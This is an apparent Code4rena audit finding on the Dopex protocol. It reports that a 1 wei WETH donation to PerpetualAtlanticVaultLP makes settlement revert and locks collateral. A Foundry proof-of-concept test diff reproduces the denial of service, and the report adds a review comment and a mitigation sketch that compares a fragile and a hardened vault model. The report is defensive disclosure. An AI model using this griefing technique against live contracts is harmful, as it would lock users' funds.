code423n4 Code4rena CODE423N4:2023-08-DOPEX-FINDINGS-ISSUES-2081
History: Sep 06, 2023 - 12:00 a.m.

Options could not be settled, causing liquidity get locked in vault

2023-09-06 00:00:00
Code4rena
github.com
5
rdpxv2core
perpetualatlanticvault
settlement vulnerability
liquidity locked
dos
donation attack vector
erc20
foundry

AI Score

7

Confidence

Low

Lines of code
<https://github.com/code-423n4/2023-08-dopex/blob/eb4d4a201b3a75dd4bddc74a34e9c42c71d0d12f/contracts/perp-vault/PerpetualAtlanticVault.sol#L359-L361>
<https://github.com/code-423n4/2023-08-dopex/blob/eb4d4a201b3a75dd4bddc74a34e9c42c71d0d12f/contracts/perp-vault/PerpetualAtlanticVaultLP.sol#L199-L205>

Vulnerability details

Impact

In the settle logic, the RdpxV2Core contract calls PerpetualAtlanticVault.settle() to update funding, burn option tokens and settle tokens. However, the call IPerpetualAtlanticVaultLP(addresses.perpetualAtlanticVaultLP).subtractLoss(ethAmount) can revert because of a donation attack vector. An attacker could transfer only 1 wei to the PerpetualAtlanticVaultLP contract to make the function PerpetualAtlanticVaultLP.subtractLoss revert.
The impacts could be:
1. Collateral gets locked in the vault.
2. The protocol's settling function is DoSed.
3. Paying funding for PerpetualAtlanticVault is blocked.

Proof of Concept

diff --git a/tests/rdpxV2-core/Unit.t.sol b/tests/rdpxV2-core/Unit.t.sol
index e11c284..a85c296 100644
--- a/tests/rdpxV2-core/Unit.t.sol
+++ b/tests/rdpxV2-core/Unit.t.sol
@@ -333,6 +333,24 @@ contract Unit is ERC721Holder, Setup {
     );
   }
 
+  function testSettle_DoS() public {
+    rdpxV2Core.bond(5 * 1e18, 0, address(this));
+    rdpxV2Core.bond(1 * 1e18, 0, address(this));
+
+    vault.addToContractWhitelist(address(rdpxV2Core));
+    uint256[] memory _ids = new uint256[](1);
+    _ids[0] = 0;
+    rdpxPriceOracle.updateRdpxPrice(1e7);
+
+    address attacker = vm.addr(1337);
+    deal(address(weth), attacker, 1 ether);
+    vm.startPrank(attacker);
+    weth.transfer(address(vaultLp), 1);
+    vm.stopPrank();
+    vm.expectRevert("Not enough collateral was sent out");
+    rdpxV2Core.settle(_ids);
+  }
+
   function testWithdraw() public {
     rdpxV2Core.addToDelegate(1 * 1e18, 10e8);
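Review bot: testSettle_DoS has no control case: it only asserts vm.expectRevert("Not enough collateral was sent out") after weth.transfer(address(vaultLp), 1), so the test does not show that rdpxV2Core.settle(_ids) succeeds with the same bond and price setup when the 1 wei transfer is omitted. Suggest taking vm.snapshot() before the prank, calling settle once without the donation, restoring with vm.revertTo(), and then running the donation path, so the revert is attributable to the transfer alone. The vm.startPrank/vm.stopPrank pair around a single call can also be reduced to vm.prank(attacker).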

Tools Used

Foundry

Recommended Mitigation Steps

Consider changing the way loss is tracked in PerpetualAtlanticVaultLP, i.e. use ERC20#transfer() to transfer tokens from PerpetualAtlanticVaultLP to the RdpxV2Core contract and then calculate the loss within the same function, instead of having PerpetualAtlanticVault call ERC20#transferFrom.
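The recommendation above, sketched as an added example that is not the Dopex code: a simplified LP vault with the fragile loss check next to a hardened one. The strict equality in subtractLoss is an assumption consistent with the revert message in the PoC; LpVaultModel, deposit and payLoss are hypothetical names.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

interface IERC20 {
    function balanceOf(address account) external view returns (uint256);
    function transfer(address to, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// Simplified model, not the Dopex contract: every name except subtractLoss
// and the revert string is hypothetical.
contract LpVaultModel {
    IERC20 public immutable collateral;
    address public immutable perpVault;
    uint256 public totalCollateral; // internal accounting, unaffected by donations

    constructor(IERC20 collateral_, address perpVault_) {
        collateral = collateral_;
        perpVault = perpVault_;
    }

    modifier onlyPerpVault() {
        require(msg.sender == perpVault, "only perp vault");
        _;
    }

    function deposit(uint256 amount) external {
        totalCollateral += amount;
        require(collateral.transferFrom(msg.sender, address(this), amount), "transferFrom failed");
    }

    // Fragile pattern (assumed): the perp vault has already pulled `loss` out,
    // and this check demands token balance == accounting. A direct 1 wei
    // transfer to this contract inflates balanceOf(), so the call reverts.
    function subtractLoss(uint256 loss) external onlyPerpVault {
        require(
            collateral.balanceOf(address(this)) == totalCollateral - loss,
            "Not enough collateral was sent out"
        );
        totalCollateral -= loss;
    }

    // Hardened pattern per the recommendation: update accounting and push the
    // tokens in one call, never comparing against balanceOf(). Donated tokens
    // sit above totalCollateral and cannot block settlement.
    function payLoss(address to, uint256 loss) external onlyPerpVault {
        totalCollateral -= loss; // reverts on underflow if loss exceeds tracked collateral
        require(collateral.transfer(to, loss), "transfer failed");
    }
}
```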

Assessed type

DoS

